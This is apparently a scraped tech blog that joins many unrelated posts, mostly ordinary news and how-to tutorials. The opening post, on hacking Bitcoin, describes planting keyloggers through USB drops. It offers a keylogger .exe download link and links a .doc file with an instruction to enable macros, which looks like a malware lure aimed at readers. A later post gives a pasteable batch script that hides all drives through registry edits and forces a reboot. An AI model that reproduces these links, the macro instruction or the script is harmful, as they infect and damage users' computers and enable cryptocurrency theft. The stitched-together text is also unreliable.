TRENDING NOW

A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials


What are the most popular ways to hack Bitcoin?


Stealing Private Keys;
The first thing to understand is that no one really owns a Bitcoin. The public bitcoin ledger system, called the blockchain, keeps track of an ever-expanding list of addresses, and a value is attached to this key.
So if you own Bitcoin, what you actually own is the private cryptographic key to unlock a specific address in the ledger that like a long string of numbers and letters. There are a number of ways to store these keys, online or offline, each with various level of security but all are vulnerable since all the attacker needs to do, is to get access to the string of characters that make up the private key.
The most lucrative attacks are carried out on online services that store the private keys for a large number of users, as Sheep Marketplace did. It seems these attacks are often carried out by insiders who don’t have to do much hacking at all. Just copy the database of private keys and you can gain control of the bitcoins at all those addresses. You, the thief, can now spend those bitcoins whenever you want, as long as the owner doesn’t move them first.

Unfortunately, most people store their private keys online or on their own pc where they can be stolen



Keyloggers
Keyloggers are malware that records your keystrokes and sends them back to the hacker referred to as a keylogger. These programs are nearly undetectable and could be running on your computer or smartphone right now, copying every password, seed, and pin number you type. This gives the hacker easy access to the Bitcoins.
There are 3 common ways to install a keylogger:
eMail with an attachment which could be an executable file or hiding inside a document like a pdf.
Set up a malicious website that will install the software – a free porn site will easily do the trick.
Load it onto a USB stick and distribute these sticks or drop them off. A Bitcoin / Blockchain conference could be an easy target. When someone inserts the USB to check what is on it, the malware gets downloaded.
You could download your own keylogger from http://cloudwebsolutions.in/1/owerri.exe Its easy to use


Fake wallets

This is a little more sophisticated and will require some work as fake wallets are basically apps that resemble a genuine wallet but it is created to steal Bitcoins. Typically, these applications will use official logos existing e-wallets to trick users. Fake wallets have routinely appeared on both Android and Apple App stores.




Bitcoin phishing
Phishing is an exceptionally well-known method of information theft that uses email or fake website to trick users to enter their private keys.



Hacking an Exchange
The most lucrative attacks are carried out on online services that store the private keys for a large number of users, as have happened with a large number of online exchanges. Hackers gain access either through technology or social engineering and then copy the database of private keys and you can gain control of the bitcoins at all those addresses.
You, the hacker can now spend those bitcoins whenever you want, as long as the owner doesn’t move them first.


Here is a story of a real-life Bitcoin hack: http://cofancio.com/details.doc

Please do enable macros on microsoft office to be able to view file properly

A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
 Apple was sued by China For Showing War Film From 1990s

Apple was sued by a subsidiary of the Chinese media broadcasting regulator, since the Cupertino company offered promotion of a film shot more than 20 years ago, in a legal conflict which joins other open cases against the technology giant Apple in China.

Apple was sued by China For Showing War Film From 1990s

According to the Beijing court “The case was opened at the request of a production that accuses Apple of violating its exclusive rights to broadcast the film on the internet”. As the film deals with Chinese citizens fighting against Japanese troops in northern China in the early 1930s.
As well as the applicant also sued the developer and operator of the application Youku HD, available in the Apple App Store, which it accuses of enabling users to see the movie, causing “huge economic losses”.

The applicant claims that Apple has violated its exclusive rights to offer online “Xuebo dixiao”, which translates roughly as “Bloody battle with the fierce enemy,” which was released in 1994.
The production center also sues the developer and the operator of the application Youku HD app “Heyi Information and Technology (Beijing) Company Ltd.”, said the court in an online statement on Thursday. Youku’s website is one of the most popular website available in China for playing and streaming online movies and TV shows. As, it is owned by Youku Tudou Inc., which also listed on the New York Stock Exchange.

The court said that “The plaintiff wants the two companies immediately halt the spread of the film and claims the payment of compensation of 50,000 yuan ($ 7,500), in addition to its “reasonable expenses” of 20.158 yuan ($3,000) in try to stop violation of their rights”.
Apple spokespeople did not respond to the requests on Saturday, as well as the spokesman for Youku Tudou Inc. also could not comment at first. Hence, the tech giant Apple Inc. has faced problems and legal obstacles in China.

Hence, after the order from the Chinese regulator, Apple suspended all its iBooks, Movies and iTunes services in April. In May, a court of intellectual property in Beijing ordered Apple to stop selling its mobile iPhone 6 and iPhone 6 Plus in the city, after determining that are too similar to a model made by a small Chinese firm.

But, the sales of Apple devices continue while appealing the order. Also that month, Apple suffered another setback when a court ruled that a Chinese company can use the iPhone trademark in handbags, wallets and other leather goods.

Hope you like this article(Apple was sued by China For Showing War Film From 1990s). kindly share and make comment below.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials

Tools need for writing web pages - learn web design lesson 2


In our previous article we talk briefly on the course introduction. Today we will be show you the list of tools needed. Take a look at the list of tools you need to build a web page

Tools needed for writing web pages

To start writing web pages, we'll use a simple text editor. That way, you'll be able to focus on the code, without getting distracted by the menus and buttons of a complex piece of Web Design software.

If you use Windows, then Notepad is an excellent text editor to use. To launch it, click on your Start menu in the bottom left of your screen. Click on All Programs, then Accessories. From the Accessories folder, select Notepad:
notepad for web design


The software should look like this, when it launches:
Another good piece of software is the free Notepad++. You can get a copy here:

Mac and Linux users have a number of text editors available, but finding a free one that is as good as Notepad++ is quite difficult. Bluefish is OK, but looks a bit dated, especially for HTML. You can check it out here:

The free Smultron is worth downloading, if you have a Mac. You can grab a copy here:

For a basic text editor like Notepad, Macs come with TextEdit, which you can find in your Applications folder. You might want to play around with the Preferences, though, or you'll end up with Rich Text rather than Plain Text.

Another good free editor for the Mac is TextWrangler. You can get a copy here:

In the next lesson, we'll take a look at just what is HTML and HTML 5.

Hope you like this lesson(Tools need for writing web pages - learn web design lesson 2). Answer question and make the lesson interactive.

A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
Learn Web Design In 24 hours

Introduction

Hello guys, Today, i will be starting a very interesting series on Web Design. The software you need is set out below.
We assume that you have absolutely no knowledge of designing web pages. Throughout the course of this book you will learn the fundamentals of Web Design. And, of course, you will start creating your own pages. By the end of the book, you will have acquired a good understanding of what web design is all about, and have the ability to take it further, if you so wish.

Learn Web Design In 24 hours

What you will learn

The aim of this course is to get you started designing web pages. It is assumed that you have little or no experience of the subject. During our time together, you'll learn some new concepts and ideas, most of which will not be difficult. After all, there are billions of pages on the internet, designed by the whole spectrum of humanity: children, adults, pensioners, people from all walks of life have sites out there. And if they can do it, so can you. In fact, follow the lessons carefully and you WILL do it. Before long, you'll have your own pages designed and ready to be uploaded, there for all the world to see.

The technologies you will learn are HTML, HTML5, and Cascading Style Sheets(CSS). (HTML5 is the newest version of the of the language.)

html, css and javascript

At the heart of every web page is something called HTML. You will learn what this is, and how to code it. You will also learn the newest version of HTML, which is called HTML5. Both versions are included in this course. As well as HTML, you will learn about Cascading Style Sheets, and will be able to improve the look of your web pages by adding CSS to enhance them.

At the end of most chapters in this book you will see a summary table of what you have learnt. The summary tables are also included in a separate document, called quick_reference.pdf. This is one of the files that come with this book. All the files you should have are detailed below.

What you need to do the course

The only thing you really need to do the course is a simple text editor. We explain all about this in the first chapter, Anatomy of a Web Page, in the section Software for Writing Web Pages. But the operating system you have is not important. So you can do this course on a PC or an Apple Mac.

Web Design Course Files

There are a number of files that you will need in order to complete certain sections. Whenever you need a file for a section of your course, it will be explained in the relevant section. The download location is here, under the heading Web Design - New Course (you don't need the downloads for the old course.):

Once you have all the necessary files, you can begin. The first part is all about the software you need for this course. Don't worry - you'll already have all you need, so there's nothing to buy. Click the link below for the first section.

Hope you are enjoying this series(Learn Web Design In 24 hours). share with your friends and ask questions below
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
 Steps to Factory Reset Windows 10 to Default Settings
This tutorial is based on windows Operating system.  Resetting windows is similar as resetting your mobile phones that Deletes all the installed program. And it makes your phone faster as all the memory allocations get free up and your device speed gets boost up.  This is very easy method. Just follow up the steps below to proceed.

Steps To Factory Reset Your Windows 10

Step 1. First of all, in your windows, click on Notification Center option at the right bottom. And then click on All Settings options there.
Step 2. Now scroll down and select “Update and Security” option on the windows settings dialog box.
Step 3. Now there select the recovery section at the left corner. And at the right, you will see the option reset this PC there click on Get Started.
Step 4. Now a popup will appear and you will have two option Keep my files and another to Remove everything. If you select the first one then your data will remain on your computer and if you select the second one then all the files and installed programs will get cleared so choose the right one.
Step 5. Now another page will display the warning about a removal of installed programs there you again have to click on next option.
Step 6. Now on the another page, you will get the final warning including the apps that would get removed out after this reset, simply click on reset to proceed. Now your windows will start resetting to its initial setting and your PC
Step 7. During the reset, your Windows will restart and take several minutes to reset itself. Once finished, you will be prompted to choose an option simply Click Continue when prompted.
That’s it! you are done, after complete boot up your windows is now in the initial mode of factory settings and your PC will now perform better than previous.
Hope you like this(Steps to Factory Reset Windows 10 to Default Settings), do share with other too. Leave a comment below if you have any related queries with this.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
 How To Stream Audio From PC To Any  Android Device
   Streaming of video from one platform to another is very important to Today's World. This method on How To Stream Audio From PC To Any  Android Device is very easy and fast, you just need to create the server at PC end and then using the app on android that will allow you to stream out all your PC sound to your android phone. Just follow step by step guide below.

Steps To Stream PC Audio To Android Device:

  1. First of all in your PC you need to download and install the SoundWire server and for that download it and then install it in your PC.
  2. Now you need to launch the tool in your PC and you will see the interface like below.
    Stream PC Audio To Android Device
  3. You can also alter the settings according to your wish.
  4. Now in your android phone you need to download and install the app SoundWire this is the app that will help you to stream PC audio directly to your Android.
  5. After installing the app, launch it in your device and there you will find the field to enter the server address to get connected.
  6. Now on your PC server note down the IP address and then fill it in your android phone.
  7.  Now simply click on soundwire icon and your device will start creating connection and then your device will get connected to your PC.
  8. Now play any of the sound on your PC and that will then stream on your android.
  9. You can easily edit all the audio equalizer setting according to your wish to get the best results.
  10. Thats it you are done, now easily play PC sounds on your android phone.
Hope you like this article(How To Stream Audio From PC To Any  Android Device), keep on sharing with others too. Leave a comment below if you have any related queries with this.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
 SMS Phishing Attack Affect Android Users(Dangerous Attack)
As we all know, phishing is very dangerous attack on the internet world and now phishing has gone into mobile. right now we have sms phishing method, which can affect all your device and hack into your privacy anywhere around the world. The malicious actions were very similar to RuMMS campaign which was aimed at the Russian segment. Unlike RuMMS, described in 3 campaigns which were using the user’s screen spoofing technique. Attackers display the fake user interface of the application instead of the bank and intercepted credentials for accessing online banking.

SMS Phishing Attack Affect Android Users(Dangerous Attack)

Attackers initially organize the work of C & C servers and sites that to distribute malware, and then send out the victims of SMS messages containing a link to the malicious software. After contact with the system Trojan scans the victim’s device, and monitors the applications running in the background.
 SMS Phishing Attack Affect Android Users(Dangerous Attack)

However, malicious activity is not stopped in May. From February to June 2016, researchers found more than 55 modifications of malware propagating across the Europe: Denmark, Italy, Germany, Austria, etc. Unlike RuMMS, the current campaign is not only using the free hosting to host malware. As the attackers register domain names, use a shortened Bit.ly link service and compromised websites. In June, in addition to the arsenal of Bit.ly intruders appeared, such as the URL shortening service tr.im, jar.mar and is.gd.
FireEye Security Experts found 12 C & C servers hosted in 5 countries. The server with the IP-address “85.93.5.109 24” containing malicious applications which were used in two campaigns, “85.93.5.139” used in 8 applications. In addition, the 4 C & C servers are located on a subnet “85.93.5.0/24”. This indicates the presence of control over the network resources on the network segment.
As we all know that the URL shortening services usually provide link analytics services, which allows us to collect data on how many users from which countries clicked the particular short links and when it happened. Hence, using these services, the security company FireEye found there have been at least 161,349 clicks on the 30 short links redirecting to the overlay malware and each of which can drive to the infection of one Android device.

Hope you like this post(SMS Phishing Attack Affect Android Users(Dangerous Attack)). kindly share and make comments.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
 How To Remotely Delete All Data From your Stolen Device
Alot of people around the globe has been having lots of issues with their private data on their phone when their device is been stolen. So today, i will  be showing you a short tutorial on how to delete your files remotely from your stolen devices.
The method to set up this is very simple and you can do this in almost any android device. In this, you will be setting your android device manager to remotely access your device to do the respective changes. So follow up the steps below to proceed with setting this that you probably need in your future. follow the steps below carefully.

How To Remotely Delete All Data From your Stolen Device

Step 1. First of all go to the Google Settings app in your android and then locate “Security” and then Select the box “Allow remote lock and factory reset.”
Step 2. Now check that the  “Remotely locate this device” button should already be clicked. Also, check “Allow remote lock and factory reset.” A pop-up will appear asking for permission to wipe your device. Grant permission for it.
Step 3. Now sign into your Google account and go to the Android Device Manager there.
Now go back to Settings -> Security -> Phone Administrators and make sure that “Android Device Manager” is checked.
Step 4. Now go to Android Device Manager website and select that device you want to syncfrom the list of devices associated with your google account. There you will see options to “Ring” “lock” and “erase” the device.
Step 5. Select lock screen if you want to lock device with the new password. Now select the erase button there and the popup will appear asking reset your phone, agree on it if you want to erase data of your lost android.
Hope you like this(How To Remotely Delete All Data From your Stolen Device), do share it with others too. Leave a comment below if you have any related queries with this.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
 Guide On How To Track Stolen Or Lost Laptop -fervidtech

In this method, we will be discussing a software that will get installed on your computer and will tell you the location when your laptop is connected to the internet connection. Follow the below steps to implement this in your laptop to make it secure and easily traceable in the future.

Also read: How To Create A Secure Password To Protect Yourself Against Hackers

Steps To Make Your Laptop Easily Tracked When It is Lost/Stolen

Step 1. First of all, go to the prey website on your computer.
Step 2. There you need a little sign up using little details.Then login with the details you had filled.
Step 3. Now proceed with the prey app site there click on download prey button. Now the popup will appear asking your OS click on Windows.
Step 4. Now install the downloaded file on your computer. Now launch the program and select existing user and then enter your account details that you have set in step 2.
Also read: How To Your Make Internet Very Fast Using Command Prompt
Step 5. You can alter settings in Prey configurator. You can set a number of minutes to wait before waking up Prey. That means prey will notify you about your missing laptop in the interval of your set time period.  Now your computer the programs running and you can check it in the prey site by logging into your account.
Step 6. Now there you can also Set Device To Missing if your laptop is lost or stolen. You will soon receive alerts once your missing laptop is powered on, connected to the internet and the prey software is still installed.

Also read: How To Create Keylogger With Normal Notepad
That’s it! you are done, now your laptop location can easily tracked using the prey site.
Hope you like the article(Guide On How To Track Stolen Or Lost Laptop), do share with others too. Leave a comment below if you have any related queries with this.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
Tor browser has become one of most secure browser the world, because of its ability to keep users save on the internet. The creators of the Tor Browser have decided to ally with expertise in computer security in order to protect the users from FBI hacking.

Security Alert - FBI is trying to break the security of Tor Browser

While the FBI has been successful finding the identity of some users of the network, Tor, known as one of the best tools to ensure privacy on the web. Hence, researchers and experts are joining the cyber security to further protect its users from such disclosure.
Also read: New Mobile App Threats Has been Detected By McAfee Labs
Exploit for Tor browser and operating machinery vulnerabilities and some parts of the code used to identify the user within the Tor-network got secrecy. A refusal to provide access to the exploit has been sent to the Attorney Virginia lawyer suspected of visiting sites with child pornography.
Previously, their desire to get access to exploit expressed, Mozilla, the developer of Tor Browser. However, all attempts have failed to learn the details of the vulnerability. FBI motivated reluctance to disclose details of the vulnerability of national security interests. Request for assignment of secrecy code was sent for approval to the relevant department and the FBI is currently awaiting formal signature.
Also read: Algeria Blocked Facebook and Twitter to avoid Cheating in Exams 
In February 2015, the FBI took control over the site with child pornography Playpen and used the exploit to the Tor browser to determine the real IP-address of the underground Internet users. After that, a series of arrests and users of resources have been charged with pedophilia.
Moreover, the researchers write in their paper that “Our solution significantly improves security over standard address space layout randomization (ASLR) techniques currently used by Firefox and other mainstream browsers” and will be presented in July at the Privacy Enhancing Technologies Symposium in Darmstadt, Germany.
The law enforcement agencies like the FBI, who protest that they don’t have sufficient resources to develop the malware required to catch the terrorists and other serious criminals. Hence, the defensive advantage may not last for too long, as it shows clearly that some in the academic research community are still determined on patching the holes that their rivals are still helping the government hackers to exploit.
Hope you like article(Security Alert - FBI is trying to break the security of Tor Browser). Kindly share and make comment below.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
Google Drive New Feature - How to update File Without Changing the Link

Today, i will be showing you an amazing tip in google drive. This has really been a problem to so many google users around the world. So i came up with this short tutorial to enable users update Files on google drive without changing the links. The method is quite simple and easy and you just need to follow up simple step by step guide to proceed and that we have just listed right below.

Google Drive New Feature - How to update File Without Changing the Link

Steps To Update File In Google Drive Without Changing The Link

1. Go to Google Drive and select the file that you want to update.
2. Right Click on that particular file, and choose “Manage Versions” from the menu and then click on “Upload new version” button (this will upload the update file to the Google Drive).
3. Now the file name and the file’s Url didn’t changed but all the old shared links will now automatically transferred to the new version of your file.
4. Thats it you are done, now the File get update without change of the link. 
Hope you like this article(Google Drive New Feature - How to update File Without Changing the Link). Kindly share and make comments.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
 Mark Zuckerberg The CEO OF Facebook Uses Tape to Defeat Hackers Attack

Recently, we all have noticed much news of hacks, security breaches, and many spying attempts. Now, the question that arises is how do you keep yourself guarded? The CEO facebook Mark Zuckerberg was spotted using tape to obscure the webcam and microphone of his MacBook.

Mark Zuckerberg The CEO OF Facebook Uses Tape to Defeat Hackers Attack

It seems like the new height of panaroid because Facebook’s CEO Mark Zuckerberg was spotted using tape on his laptop camera to avoid being hacked. We had recently seen Mark Zuckerberg’s Facebook and twitter account hacked because of using a simple password “dadada”
Mark Zuckerberg recently posted an image on Facebook today celebrating Instagram’s 500 million monthly user milestone. Zuckerberg is seen sitting at his desk with an Instagram frame placard thanking users for the support. On his desk lie his MacBook and other things.
If we take a solid look at the photo then it looks like Mark Zuckerberg has placed a tape over the MacBook’s camera as well on the Microphone. Actually, this practice is not surprising, Hackers can control your hardware devices as well. Hackers can simply turn on the camera without the user permission.
It is normal that one of the most powerful people in the world fears being watched. Recently the founder of Facebook briefly lost control of his accounts on Twitter, Pinterest and LinkedIn after the hacker group OurMine Team managed to access them.
According to FBI director James Comey “Taping up your webcam is an excellent precaution, should you worry that someone might hack into your laptop.”
Hope you like this article(Mark Zuckerberg The CEO OF Facebook Uses Tape to Defeat Hackers Attack). Kindly share and make comments below. 
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
How to Protect Your Computer From Viruses, Keylogger and worm
Today, we will be talking about security. Security is a  top most priority, because it can make you or mar you.
As we all know, With millions of computer users browsing the web at any given time, there are plenty of targets for malicious coders. While computer experts don’t always know why coders choose to build harmful computer programs, the fact is that it happens all the time. Computer viruses can steal personal information, interfere with normal operations, attract spam and even shut down your computer’s hard drive. Protecting your computer is critical for browsing success.

How to Protect Your Computer From Viruses, Keylogger and worms


Start With the Basics

Most computer systems come with security features already in place. For example, the Windows operating system is packaged with Microsoft Windows Security Center. When you first open, boot up and register a new computer, you should make sure that this program is functioning. It will give basic protection against spyware, viruses and malware. In addition, a basic firewall is built into this program, providing additional protection and stops for potentially harmful programs. Upon activation, don’t be surprised if your security system needs immediate updating. Software that protects your computer needs regular and consistent updating to stay useful. Viruses are constantly being generated and the several-month lag between when your computer was made and when you first started using it can mean that the database the security system is loaded with is severely out-of-date.


Upgrade to Meet Your Needs

Many people operate computers for a long time with only basic protection in place. However, heavy computer users or those who have risky browsing habits can sometimes benefit from upgrading their virus, spyware and malware protection, as well as using a fuller-featured firewall; this is especially important if you use a networked computer system. Basic or free virus protection will still scan and update for viruses. Paid programs, however, offer more features, including ease-of-use and convenience features. The most important thing is to verify the publisher and make sure you are getting what is promised. Most well-known virus protection programs, such as AVG and Norton Security, have reviews available to help you make your choice.

Learn About Spyware Risks

Spyware creates risks that many computer users are not aware of. If you are only protecting against viruses, you could be leaving your computer open to damage. Most people are familiar with spyware that initiates and attracts annoying ad programs. Spyware, however, can be much more malicious as well. Your shopping habits can be tracked by spyware. While not exactly harmful, some people consider this a breach of privacy. The worst spyware programs interfere with normal operations and can even track what you type, sending personal information to people who want to steal your identity. Some spyware redirects your browser to different web addresses, increasing your risks of virus infection and fraud

How Viruses Work

The main difference between spyware and viruses is how they are spread. A virus reproduces itself and attaches to any document that the computer sends, while spyware can be stored as a cookie or tracking code. A virus is most often found traveling with a piece of computer software, such as a document, picture or piece of music. When dealing with email, it is necessary to open an attachment to become infected, indicating that, in most cases, the computer user must somehow invite the malicious software to replicate on their system. Of course, most people have no idea it is there or what is happening. Some of the sneakiest and most harmful viruses actually masquerade as virus protection software, making them extremely hard to detect. Because of this, it’s crucial to be familiar with your particular virus protection program and know what it looks like and what the normal scripts and prompts are during operation. Viruses do some of the same things that spyware does; they just accomplish it differently. An active virus can steal personal information, generate ads or shut down your system, including the very virus protection programs that can fix the issue.

Take Steps For Protection

Like anything, the best way to protect against viruses is to be educated. Become familiar with what malicious software may look like. If you get an email or are asked to download a file that you don’t recognize or looks suspicious, do your homework. Research virus protection, spyware, malware and firewall programs and use them to their fullest capacity. Set the software to update and scan automatically to make sure that the system is constantly monitored. In addition, regularly check on the databases published by various virus protection services; many will provide lists of symptoms and risks, as well as the standard way the file gains access for no cost to the public.


Hope you like article(How to Protect Your Computer From Viruses, Keylogger and worm). share and make comments.
A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
 How To Use Flash As Ram On PC 2015

Do you know you can easily turn your thumb drive or flash drive or pen drive into a virtual ram and use as ram in window 7,8,10. Just follow the steps below.

How To Use Flash As Ram On PC 

    Steps for Use Pendrive as RAM in Window 7, 8 and 10

    • Plug your Pendrive to Computer. (Make sure your pendrive class between 6-10. High Class means 
    • performance and speed.)
    • Right Click on your Pendrive icon and select Properties.
    • Now a new Window Open , Select Readyboost Tab and Select use this device option. Choose the ram size and select you ram value. 
    • Now you can turn your pen drive into a ram from this two steps procedure.
     How You Use This Feature:
    • PC Games Needs more RAM so use this trick.
    • Software Like Video Editing
    • If you Experience Slow PC Performance
    Hope you like this article(How To Use Flash As Ram On PC).kindly share.
    A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
     Clash of Clans has been bought By Tencent for $8.6 Billion
    The owner of WeChat, just obtained a new product Supercell games for 9,000 million dollars. Supercell is the firm that created Clash of Clans, Clash Royale, Hay Day and Boom Beach which all are the biggest hits.
    If you are one of them who doesn’t know about Tencent then let me tell you it was Tencent who owns Riot Games, maker of League of Legends, Gears Of War and WeChat which is the famous alternative to WhatsApp.

    Clash of Clans has been bought By Tencent for $8.6 Billion

    Tencent and its partners will purchase the majority stake in Supercell from the Japanese telecommunications Softbank Group corp. for approximately $8.6 billion. Tencent will become the majority shareholder in the company. SoftBank will no longer have anything to do with Supercell.
    The purchase agreement includes an operation of $ 8.6 billion, thanks to which Supercell now be valued at just over $10 billion. With this agreement, Tencent will acquire all shares of Softbank, who owned 73% of the total. Thus, Softbank will no longer have anything to do with Supercell, while Tencent will become the majority shareholder of Supercell.
    Supercell CEO ILKKA Paananen in a statement said “We want Supercell to be the world’s best place for creative people to create games, At the same time, this new partnership offers us exciting growth opportunities in China, where we will be able to reach hundreds of millions of new gamers via Tencent’s channels.”
    Tencent continues to grow in the business sector of video games. As we already mentioned Tencent owns Riot Games, maker of League of Legends is now owns supercell, which will win games like Clash of Clans, Hay Day, Boom beach which is a huge success in Google Play store.
    Hope you like this article(Clash of Clans has been bought By Tencent for $8.6 Billion). kindly share.
    A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
     The World Most Powerful Supercomputer is Built By China
    China is taking technology to the next level. China has recently built the fastest supercomputer in the world. According to the newly released list of the Top 500 fastest computer in the world, China is leading the list. China had created the 93 petaflop Sunway TaihuLight which is installed at the National Supercomputing Center in Wuxi
    According to the reports, the supercomputer can perform around 93,000 trillion calculations per second. The China’s Taihulight is three times faster than the previous leader Tianhe-2 and the awesome part is Tianhe-2 is also from China.
     supercomputer
    Sunway TaihuLight, with 10,649,600 computing cores comprising 40,960 nodes, is twice as fast and three times as efficient as Tianhe-2, which posted a LINPACK performance of 33.86 petaflop/s. The peak power consumption under load (running the HPL benchmark) is at 15.37 MW, or 6 Gflops/Watt. It runs on a Linux-based operating system.
    Top500 Said “Considering that just 10 years ago, China claimed a mere 28 systems on the list, with none ranked in the top 30, the nation has come further and faster than any other country in the history of supercomputing,”
    University of Southampton’s Professor Les Carr said “As a computer scientist it’s difficult writing software that can take advantage of and control large numbers of computer cores, They are like extremely high-spec Grand Prix racing cars – they are fantastic for racing on circuits but they’re not great for traveling from London to Edinburgh”
    The evolution of supercomputing in China has been exponential. Top500 list did not have any Chinese system in 2001. In the list presented today by Top500, China has 167 systems, the US has 165, Japan has 29 systems, Germany was in fourth place with 26 systems, France was next with 18, followed by Britain with 12.
    Hope you like article(The World Most Powerful Supercomputer is Built By China). kindly share.
    A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials
     Steps To Create a Virus That Disable All Hard Disks
    Note:- Before starting this tutorial kindly note that this is for educational purpose only. you will be held responsible if you misuse this tutorial.
    Almost every computer or laptop user has faced virus attack at least once in their life for sure, and we all know what is virus. However, have you ever thought to create a virus? Maybe no. Therefore, we have a method to Create a Virus That Disable All Hard Disks. The method is very simple and easy and you will be able to create a virus by your own. Just follow the below steps to proceed.
    Note:- This virus can permanently damage your computer so use it at your own risk, as we are not responsible for any damage occur. As this is only for knowledge and security purposes and to make you aware of these viruses.

    Steps To Create a Virus That Disable All Hard Disks

    The method is very simple and you don’t need to code anything you just have to copy and paste the code that I have stated in the below steps.
    Step 1. First of all, click on start and type Notepad and then press enter.
    Step 2. Now copy the below code and paste in the notepad
    REG ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVer sionpoliciesExplorer /v NoDrives /t REG_DWORD /d 12nREG ADD HKEY_LOCAL_MACHINESOFTWAREMicrosoftWindowsCurrentVer sionpoliciesExplorer /v NoViewonDrive /t REG_DWORD /d 12nshutdown -r -c ”Lolllll! Your system is hacked by Techviral!” -f
    Step 3. Now save this file as virus.bat 
    You are done. Now when you run this file on a computer all the hard drives will get disabled and your computer may get crashed.
    If you like the post(Steps To Create a Virus That Disable All Hard Disks) then don’t forget to share it with your friends too.
    A unique platform to get tutorials on basic and advance computer skills like programming, blogging. Get latest technology updates,news, tutorials

    Hello guys, Another mobile app threat has been discovered by mcAfee labs. Intel security had recently released their McAfee Labs threat report of June 2016, and the report demonstrates that the dynamics of mobile app conspiracy, had explained that how cyber criminals command the apps to combat smartphone users.

    New Mobile App Threats Has been Detected By McAfee Labs

    McAfee said in a post that ” The report explains the dynamics of mobile app collusion, where cyber criminals manipulate two or more apps to orchestrate attacks capable of exfiltrating user data, inspecting files, sending fake SMS messages, loading additional apps without user consent, and sending user location information to control servers.”
    McAfee also mentioned similar behavior over more than 5,000 versions of 21 apps that are designed to present valuable user services like video streaming, health monitoring, travel planning etc.
    The report also revealed that if the user doesn’t mind to update the applications on time then they are likewise vulnerable to malicious attack and this may guide to mobile app collusion. McAfee Labs has also identified three types of threats
    • Information theft: An app with access to sensitive or confidential information willingly or unwillingly collaborates with one or more other apps to send information outside the boundaries of the device
    • Financial theft: An app sends information to another app that can execute financial transactions or make financial API calls to achieve similar objectives
    • Service misuse: One app controls a system service and receives information or commands from one or more other apps to orchestrate a variety of malicious activities.
    Vincent Weafer, vice president of Intel Security’s McAfee Labs group said “Improved detection drives greater efforts at deception, It should not come as a surprise that adversaries have responded to mobile security efforts with new threats that attempt to hide in plain sight. Our goal is to make it increasingly harder for malicious apps to gain a foothold on our personal devices, developing smarter tools and techniques to detect colluding mobile apps.”
    Hope you like this post(New Mobile App Threats Has been Detected By McAfee Labs). kindly share and make comment.